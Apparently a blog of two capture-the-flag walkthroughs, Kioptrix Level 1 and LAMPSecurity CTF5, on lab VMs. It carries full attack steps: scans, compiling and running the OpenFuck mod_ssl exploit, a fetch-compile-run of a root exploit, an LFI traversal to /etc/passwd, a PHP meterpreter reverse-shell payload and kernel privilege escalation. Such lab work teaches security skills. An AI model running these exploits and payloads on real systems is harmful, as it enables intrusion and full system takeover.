Tango Down (Kioptrix1) : Kioptrix Level 1 (#1) Challenge Walkthrough

Lab Environment :

Victim Host : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ on VirtualBox
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below

Discovery :Changed the setting for the VMas host-only, ran an nmapscan

root@kali:~/tools/practice/bash/lab# nmap -sT 192.168.56.1-254

Starting Nmap6.47 ( http://nmap.org) at 2015-10-27 23:09 GMT
Nmapscan report for 192.168.56.1
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmapscan report for 192.168.56.100
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BD:93:7E (CadmusComputer Systems)

Nmapscan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
139/tcp open netbios-ssn
32768/tcpopen filenet-tms
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)

Nmapscan report for 192.168.56.110
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcpopen ssh

Nmapdone: 254 IP addresses (4 hosts up) scanned in 15.41 seconds

Additional Scan

root@kali:~/tools/practice/bash/lab# nmap-v -sS -sV -O 192.168.56.101

Starting Nmap6.47 ( http://nmap.org) at 2015-10-27 23:14 GMT
NSE: Loaded 29 scripts for scanning.
Initiating ARPPing Scan at 23:14
Scanning 192.168.56.101 [1 port]
Completed ARPPing Scan at 23:14, 0.01s elapsed (1 total hosts)
Initiating Parallel DNSresolution of 1 host. at 23:14
Completed Parallel DNSresolution of 1 host. at 23:14, 0.02s elapsed
Initiating SYN Stealth Scan at 23:14
Scanning 192.168.56.101 [1000 ports]
Discovered open port 443/tcpon 192.168.56.101
Discovered open port 139/tcpon 192.168.56.101
Discovered open port 22/tcpon 192.168.56.101
Discovered open port 111/tcpon 192.168.56.101
Discovered open port 80/tcpon 192.168.56.101
Discovered open port 32768/tcpon 192.168.56.101
Completed SYN Stealth Scan at 23:14, 0.34s elapsed (1000 total ports)
Initiating Service scan at 23:14
Scanning 6 services on 192.168.56.101
Completed Service scan at 23:14, 12.08s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSEat 23:14
Completed NSEat 23:14, 0.04s elapsed
Nmapscan report for 192.168.56.101
Host is up (0.00031s latency).
Not shown: 994 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC#100000)
139/tcp open netbios-ssn Samba smbd(workgroup: 9DMYGROUP)443/tcp open ssl/http Apache httpd1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcpopen status 1 (RPC#100024)
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Tue Oct 27 23:08:14 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IPID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmapdone: 1 IPaddress (1 host up) scanned in 14.50 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1018 (41.493KB)

So some vectors we see from above are :

• SSH Server
• Web Server (http,https)
• Samba Server
• NFS Server, Portmapper(111)

Tried accessing the web server:

Seems like a redhat server

Lets run some NMAPNSE's:

-- Tried http nmap nse's - no results
-- Tried SMB nse's, including smb-vulns-scan -- Nothing interesting


Vulnerability Assessment and Exploit :Run Nikto:

root@kali:~/vulhub/kioptrix1.0# nikto -h 192.168.56.101
- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-27 23:33:56 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodesvia ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 04:12:46 2001
+ The anti-clickjackingX-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSSvia the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username(responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoSand possible code execution. CAN-2002-0392.+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.+ OSVDB-682: /usage/: Webalizermay be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 10 error(s) and 18 item(s) reported on remote host
+ End Time: 2015-10-27 23:40:54 (GMT0) (418 seconds)
---------------------------------------------------------------------------

Found some vulnerabilities as above. Search for CVE-2002-0082 and you will get the below link :

https://www.exploit-db.com/exploits/764/

Once your download this , you need to compile and execute this :

root@kali:~/vulhub/kioptrix1.0# ls
764.c http-nse.txt smb-nse.txt

root@kali:~/vulhub/kioptrix1.0# gcc764.c -o openfk
764.c:651:2: error: unknown type name ‘RC4_KEY’
764.c:652:2: error: unknown type name ‘RC4_KEY’
764.c: In function ‘read_ssl_packet’:
764.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c:844:7: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘send_ssl_packet’:
764.c:882:2: error: unknown type name ‘MD5_CTX’
764.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘get_server_hello’:
764.c:1009:2: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [enabled by default]
In file included from /usr/include/openssl/ssl.h:156:0,
from 764.c:20:
/usr/include/openssl/x509.h:840:1: note: expected ‘constunsigned char **’ but argument is of type ‘unsigned char **’
764.c: In function ‘generate_key_material’:
764.c:1106:2: error: unknown type name ‘MD5_CTX’
764.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘generate_session_keys’:
764.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764.c:1127:31: error: expected expression before ‘)’ token
764.c:1131:32: error: expected expression before ‘)’ token

Now it is very likely that you get the above error while compiling. After hours of search I found the below link which can help in fixing the problem... (I so wish I knew c programming)

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/Here are the steps to make this work :

1) Add those headers :

#include
#include

2) Update the URL of the C file.

Search for wgetand replace the URL with this new one :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get libssl-devlib

Install them : apt-get install libssl-dev

4) Update declaration of variables

Line 961, change : unsigned char *p, *end;
By adding const: constunsigned char *p, *end;

5) Compile then code and you’re done

To compile :
gcc-o OpenFuck764.c -lcrypto 
root@kali:~/vulhub/kioptrix1.0# gccopenfk.c -o openfk-lcrypto

root@kali:~/vulhub/kioptrix1.0# ls -l
total 140
-rw-r--r-- 1 root root 33617 Oct 27 23:39 764.c
-rw-r--r-- 1 root root 2289 Oct 27 23:23 http-nse.txt
-rwxr-xr-x 1 root root 60991 Oct 27 23:47 openfk
-rw-r--r-- 1 root root 33684 Oct 27 23:46 openfk.c
-rw-r--r-- 1 root root 351 Oct 27 23:24 smb-nse.txt
root@kali:~/vulhub/kioptrix1.0# ./openfk

*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

: Usage: ./openfktarget box [port] [-c N]

target - supported box eg: 0x00
box - hostnameor IPaddress
port - port for sslconnection
-c open N connections. (use range 40-50 if u dontknow)
++++ Truncated++++++++++++++++++

Now for the targets, the closest as per our version match from nmapis as below0x6a - RedHatLinux 7.2 (apache-1.3.20-16)1
0x6b - RedHatLinux 7.2 (apache-1.3.20-16)2

nmapoutput : 80/tcp open http Apache httpd1.3.20((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)


Running the exploitroot@kali:~/vulhub/kioptrix1.0# ./openfk 0x6a 192.168.56.101 443 -c 50*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

Connection... 50 of 50
Establishing SSLconnection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a did not give us a shell, lets try the other one... 0x6b



root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6b 192.168.56.101 443 -c 50

*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

Connection... 50 of 50
Establishing SSLconnection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ hostname
hostname
kioptrix.level1
bash-2.05$ uname-a
uname-aLinux kioptrix.level1 2.4.7-10 #1 Thu Sep6 16:46:36 EDT 2001 i686 unknown
bash-2.05$ cat /etc/release
cat /etc/release
cat: /etc/release: No such file or directory
bash-2.05$ cat /etc/issue
cat /etc/issue
Welcome to Kioptrix Level 1 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrixis not resposiblefor any damage or instability
caused by running, installing or using this VMimage.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

bash-2.05$ Good Bye!

Now we are in and have a shell. Time for escalating our privileges.

Privilege EscalationWe see when we run the above exploit, it tries to download the ptrace-kmod.c to give us a root shell, however that doesnthappen.

exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'

What we can do is to manually download this file on your host :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Once you download it, compile it .. when I compile it on my Kali node, below is what I get..

root@kali:~/vulhub/kioptrix1.0# gcc895.c -o privesc1
895.c:80:1: warning: missing terminating " character [enabled by default]
895.c:80:1: error: missing terminating " character
895.c:81:1: error: stray ‘\’ in program
895.c:81:1: error: stray ‘\’ in program
895.c:81:2: error: ‘x00’ undeclared here (not in a function)
895.c:81:6: error: expected ‘,’ or ‘;’ before ‘x00’
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program895.c:82:1: error: stray ‘\’ in program

This is full of errors, probably its a new compiler version so this problem. What I did was that I downloaded this c file from my attacking node to the victim node, compiled it on that node only as this was older version. Post compilation I ran the binarybash-2.05$ wget http://192.168.56.110/ptrace-kmod.c

wget http://192.168.56.110/ptrace-kmod.c
--00:05:36-- http://192.168.56.110/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.110:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

00:05:36 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

bash-2.05$ ls
ls
895.c
ptrace-kmod.c
bash-2.05$ gccptrace-kmodc-o ptrace
gccptrace-kmodc-o ptrace
gcc: ptrace-kmodc: No such file or directory
gcc: No input files
bash-2.05$ gccptrace-kmodc.c -o ptrace
gccptrace-kmodc.c -o ptrace
gcc: ptrace-kmodc.c: No such file or directory
gcc: No input files
bash-2.05$ gccptrace-kmod.c -o ptrace
gccptrace-kmod.c -o ptrace
bash-2.05$ ls
ls
895.c
ptrace
ptrace-kmod.c
bash-2.05$ chmod+x ptrace
chmod+x ptrace
bash-2.05$ ./ptrace
./ptrace
[+] Attached to 6416
[+] Waiting for signal
[+] Signal caught
[+] Shellcodeplaced at 0x4001189d
[+] Now wait for suidshell...


id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


We are now as root in the node

Tango Down (CTF5) : Capture The Flag (CTF) 5 Lamp Security Challenge

Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf5,84/  on VirtualBox (MacOS)

Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

Install the image

Run a network scan on the range :root@kali:~/vulhub/ctf5# nmap-sT192.168.56.1-254Starting Nmap6.47 ( http://nmap.org) at 2015-10-31 00:22 GMT
Nmapscan report for 192.168.56.1
Host is up (0.00036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmapscan report for 192.168.56.100
Host is up (0.000079s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:79:AC:8C (CadmusComputer Systems)

Nmapscan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcpopen mysql
MAC Address: 08:00:27:C3:02:2B (CadmusComputer Systems)

Nmapscan report for 192.168.56.110
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcpopen ssh
80/tcpopen http

Nmapdone: 254 IPaddresses (4 hosts up) scanned in 15.32 seconds


Possible vectors are :

• Webserver
• Mail (IMAP,POP)
• NFS, Portmapper
• netbios
• samba
• mysql

Assessing the webserver:Open the link in browser (http://192.168.56.101)

It gives us a default linux apache page :

just tried giving different paths

e.g. index.php... gives below :

When I click blog I get :

When I go back and click contact :

Go back and click Events

Now we see this has different webappsinstalled.

Now on the blogpage, clicking on the links on the navigation pane, I have got below :Webmail

Admin Login

Vulnerability Assessment and Exploit :

Squirrelmailversion had 2 found vulnerabilities :root@kali:/var/www# searchsploitsquirrel |grep1.4.x
SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability | /php/webapps/24068.txt
Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability | /php/webapps/27948.txt

Tried them :Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability :

SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability

Same as above, no luck..

No lets run Niktoto see if we can get some more :

root@kali:~/tools/practice/bash/lab# nikto-h http://192.168.56.101

- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-31 21:18:00 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjackingX-Frame-Options header is not present.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username(responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHPinclude error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdminis for managing MySQLdatabases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSIDcreated without the httponlyflag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMailfound
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMailfound
+ OSVDB-3233: /info.php: PHPis installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodesvia ETags, header found with file /icons/README, inode: 557285, size: 5108, mtime: Fri Jun 19 19:31:28 1998
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHPinclude error may indicate local or remote file inclusion is possible.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFIfrom RSnake'slist (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmindirectory found
+ 7355 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2015-10-31 21:18:37 (GMT0) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So now we got some more vectors.

Trying the below paths one by one :/index.php?page=../../../../../../../../../../etc/passwd << As per nikto, no luck

We removed the path and saw what comes up, if we see above it shows that it is also adding a .phpas suffix, so we need to add "" which is a nullbyteand terminate the addition of php

Now keep adding ../etc/passwd till we get some results

Bang, we see LFIsuccessful.

Now we try to fetch some more information e.g. mysql:

[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1 [mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Try viewing access_log :

Another vector was the Nanocms

Using Google :

http://www.securityfocus.com/bid/34508/exploit

When we try this :

For us the key from above is :
"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

Now cracking the password :

Now lets try to access the portal :We managed to login to the admin panel

Now we see that we have an option to create a new page using the adminpanel

My steps would be :

1- Create a phppayload on my KALI host
2- Create a page on NanoCMSand copy the code on the nanocms
3- Open a handler on my KALI host
4- Open the shellcodepage
5- We should get our meterpreteron our KALI host

Lets try it now.


Step 1 :

root@kali:/var/www# msfpayloadphp/meterpreter/reverse_tcpLHOST=192.168.56.110 LPORT=4444 R > malicious.php
[!] ************************************************************************
[!] * The utility msfpayloadis deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenominstead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
root@kali:/var/www# vi malicious.php
root@kali:/var/www# cat malicious.php
#
error_reporting(0);
# The payload handler overwrites this with the correct LHOSTbefore sending
# it to the victim.
$ip= '192.168.56.110';
$port = 4444;
$ipf= AF_INET;

if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip= "[". $ip."]";
$ipf= AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif(($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif(($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
case 'stream': $len= fread($s, 4); break;
case 'socket': $len= socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len= $a['len'];

$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();


Step 2 :

Step 3:msfexploit(udev_netlink) > use exploit/multi/handler
msfexploit(handler) > set LPORT4444
LPORT=> 4444
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (linux/x86/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > exploit

[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...

Step 4:

Step 5:msfexploit(handler) > exploit 
[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...
[*] Sending stage (40499 bytes) to 192.168.56.101
[*] Meterpretersession 3 opened (192.168.56.110:4444 -> 192.168.56.101:35181) at 2015-10-31 23:49:23 +0000

meterpreter> sysinfo
Computer : localhost.localdomain
OS :Linux localhost.localdomain2.6.23.1-42.fc8#1 SMPTue Oct 30 13:55:12 EDT 2007 i686
Meterpreter: php/php

meterpreter> getuid
Server username: apache (48)
meterpreter> getpid
Current pid: 6464


We have a shell now

However we are in with apache user. We need to attempt an privilege escalation


Now steps I will try :

Step 1 : As I am on KALI linux, will search for PE exploits locally firstroot@kali:~/vulhub/ctf5# searchsploit2.6.23 local linux
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------- Description | Path
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Linux Kernel 2.6.23 <= 2.6.24 - vmspliceLocal Root Exploit | /linux/local/5093.c
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------

Step 2 : Will compile the binaryroot@kali:~/vulhub/ctf5# locate /linux/local/5093.c
/usr/share/exploitdb/platforms/linux/local/5093.c
root@kali:~/vulhub/ctf5# cp/usr/share/exploitdb/platforms/linux/local/5093.c .
root@kali:~/vulhub/ctf5# ls -ltr
total 4
-rwxr-xr-x 1 root root 2883 Nov 1 00:02 5093.c
root@kali:~/vulhub/ctf5# gcc5093.c -o 5093

Step 3 : Transfer the file to the victim from the meterpretermeterpreter> lcdvulhub
meterpreter> lcdctf5
meterpreter> lpwd
/root/vulhub/ctf5
meterpreter> upload 5093 /tmp/5093
[*] uploading : 5093 -> /tmp/5093
[*] uploaded : 5093 -> /tmp/5093

Step 4 : Now execute the file and see if we get root

meterpreter> shellProcess 13468 created.
Channel 2 created.

cd/tmp

ls
5093
gconfd-patrick
gconfd-root
gnome-system-monitor.patrick.3563912106
mapping-andy
mapping-jennifer
mapping-loren
mapping-patrick
mapping-root


./5093
/bin/sh: line 9: ./5093: Permission denied

chmod+x 5093


./5093
bash: no job control in this shell

bash-3.2# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_t:s0

bash-3.2# whoami
rootWE ARE ROOT NOW !!
Post Exploit:

bash-3.2# cat passwdroot:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:RpcbindDaemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCDDaemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
